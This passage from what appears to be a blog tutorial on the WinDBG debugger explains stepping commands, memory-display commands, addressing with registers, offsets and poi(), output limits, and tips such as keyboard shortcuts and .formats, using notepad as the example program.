Here we can see that we were running within notepad!WinMainCRTStartup, then on the call we used t to follow the call into the notepad!__security_init_cookie function, where we paused on the first instruction.

Step-Over

0:001> p 


WinDBG uses the p command to step over a function call. This means that the call and all subinstructions within the called function will be executed and the program will pause on the next instruction within the current function (e.g. notepad!WinMainCRTStartup). Let's look at the same scenario, but this time we'll use p:



Here we can see that the instruction after the call to notepad!__security_init_cookie is push 58h. When we Step-Over with p we automatically execute everything within the notepad!__security_init_cookie function, then pause at the push after it.

Step-Out

0:001> gu 


Stepping-Out with WinDBG can be achieved with the gu (Go Up) command. This command scans the current function for a ret then pauses after it gets executed. This an important behavior, because if, for whatever reason, the function doesn't end in a ret or a code path doesn't lead to one, you could experience unexpected results with gu. Let's see what it looks like:



Here we've paused on notepad!WinMainCRTStartup+0x1d which is a call to notepad!_imp__GetStartupInfoA. We can see (u eip L2) that the instruction after the call is mov dword ptr [ebp-4],0FFFFFFFEh. So we'll single step (t) into the function and pause at the first instruction. Now we use gu to execute all instructions and function calls in our child function then pause on the next instruction in the parent function, which is our mov dword ptr [ebp-4],0FFFFFFFEh

Executing until Return

gu is good and all, but sometimes you want to look at the stack right before the function returns, in this scenario, you'll need to use either tt (Trace to Next Return) or pt. Both are easy to call:

0:001> tt 


0:001> pt 


The important thing here to remember is that tt will stop at the next return, even if its not in the current function. For instance, consider the following pseudocode, our goal is to pause on the ret in func:


func:
call somefunc
ret

somefunc:
call someotherfunc
ret

someotherfunc:
ret


In this example, if pause at call somefunc, then use tt, we'll end up pausing at the ret in someotherfunc.

A better approach for this scenario might be to use pt: Using the same pseudocode, if we pause at call somefunc, then use pt, we'd execute all the code in somefunc (and subsequently someotherfunc), then pause at the ret in func. In all reality for this example we could just use p, but that doesn't illustrate the point :)

Ultimately it depends on what you, as the person using the debugger, want to do.

Inspecting Memory

Now we can finally get into the most important part of debugging: Inspecting Memory. WinDBG provides the d (Display Memory) command for this purpose. In its most simple form you can run it like this:

0:001> d


But this is more or less useless. Running d by itself for the first time will output the memory where eip points to. This is useless because eip should be pointing to a code segment and, to make sense of that, you'd really need to use the u (Unassemble) command. So a much better starting out command would be:

0:001> d esp


This will show us the values on the stack. With d, WinDBG will display data using the format specified by the last d command executed. If this is you're first time running d, it doesn't have previous command stored, so WinDBG will give you the output of the db (Display Byte) command.

Display Bytes

db will output the data in bytes and provide the corresponding ASCII values:



Display Words

Words, or 2 byte values, can be shown with dw (Display Word). Alternatively, you can use dW to show Words and ASCII values:



Display DWORDs

My favorite memory viewing command is dd (Display DWORDs). A DWORD is a double word, so 4 bytes. dd will just show you the DWORDS while dc will show DWORDs and ASCII values:



Display Quadwords

To display quadwords (4 words/8 bytes) within WinDBG, use dq:



Display Bits

You can even show binary with dyb:



Displaying Strings

Strings are displayed with da, essentially WinDBG will print everything as ASCII until it reaches a null byte. So here, even though esp isn't a string, it'll treat everything as a string until it reaches a null. Just to further illustrate this, I've printed out the 5 bytes at esp with db esp L5:



Addressing

So far we've just been looking at the memory that esp is pointing to by using esp as the parameter to our memory inspection comman however there are a number of different ways to reference memory that can be useful when starting out.

Registers - As we've seen, you can use any register and WinDBG will use the address in that register as the memory address:

0:001> dd eax


Memory Address - You can also just use the memory address itself by providing it:

0:001> db 0020faa0  


Offsets - You can also use offsets with registers or memory addresses by using mathematical expressions:

0:001> db 0020faa0 + 18


0:001> dd ebp - 18


0:001> dq ebp*eax


These expressions can be used wherever an address can be used. Here's what it looks like in WinDBG:



WinDBG will output question marks (?) for invalid/free memory.

Pointers

There are often times where a value on the stack is just a pointer to another location. If you'd like to look at that value you'd need to do two look ups. For instance, say we know that value ebp+4 is a pointer to some assembly code that we want to read. To view that assembly, we'd need two commands. The first command shows us the memory address at ebp+4:



0:001> dd ebp+4


Then the second requires us to manually copy the value at that address then paste it in as an argument to the u command so we can view that assembly:

0:001> u 777be2d1




This is all fine, but there's an easier way with the poi() function. Using poi() we just provide ebp+4 as its parameter and it will automatically take the value at that address and use it, rather then just using the value of ebp+4:

0:001> u poi(ebp+4)




Limiting output

By default WinDBG will output a set amount of data, however we can limit how of that data is outputted with the L (Size Range Specifier) attribute. L will work with most commands and just needs to be appended to the end with a value:

0:001> dd esp L1


The number specified with L is the size, which is related to the command executed. For instance, with db, L will mean the number of bytes to print, while with dd, L will mean the number of DWORDS.



That's really it to get you off the ground inspecting memory - I know, three blog posts building up to this functionality, and its just this tiny little section? Yup - there are some more memory inspection commands, but to get started, d is the core command. Check out the tips below for more info.

Tips and Tricks

Now that you're off the ground, lets look at some handy tricks and tips that can make your debugging experience much better.

Keyboard Shortcuts

Chances are you'll be starting and stopping an application hundreds of times while you're debugging so any little shortcut can solve you tons of time in the long run. Keyboard shortcuts are huge, here are the four I use the most:

  • F6 - Attach to a process. With the Attach Window open, use the "End" key to drop down to the bottom (where newly launched applications are).
  • CTRL + E - Open Executable
  • CTRL + Break - "Break" into a running application - used to pause a running program
  • F5 - Shortcut for g

Converting Formats

If you haven't figured this out already, WinDBG prints numbers in hex by default. That means 12 isn't the same as decimal 12. One quick tip is the .formats command. To use it is straightforward:

0:001> .formats value


Where value is something you want to convert. So .formats will take whatever you provide and output it in a variety of formats:

Now we know 12 is actually 18 :). However, you can also provide decimal values using the 0n specifier:



Math

There may be times where you need to calculate an offset or just do some basic math. WinDBG will evaluate expressions with the ? command:

0:001> ?1+1


These expressions can be as simple or as complicated as you'd like can contain all of the standard addressing that WinDBG uses:



...who needs calc.exe when you have WinDBG!

Extensions

To make life easier, there are a number of extensions that people have created for WinDBG. These are great little tools that can be used within the debugger to provide functionality. Some are even built by Microsoft. The useful ones are !heap, !address, !dh, and !peb. I'll cover these and more in another blog post - So stay tuned!

Cheat Sheets

There are a couple of really nice WinDBG command references, cheat sheets, and tutorials out there if you don't like .hh, here are a couple good ones:

Got any more tips or tricks? Share them in the comments below!

Viewing all 107 articles
Browse latest View live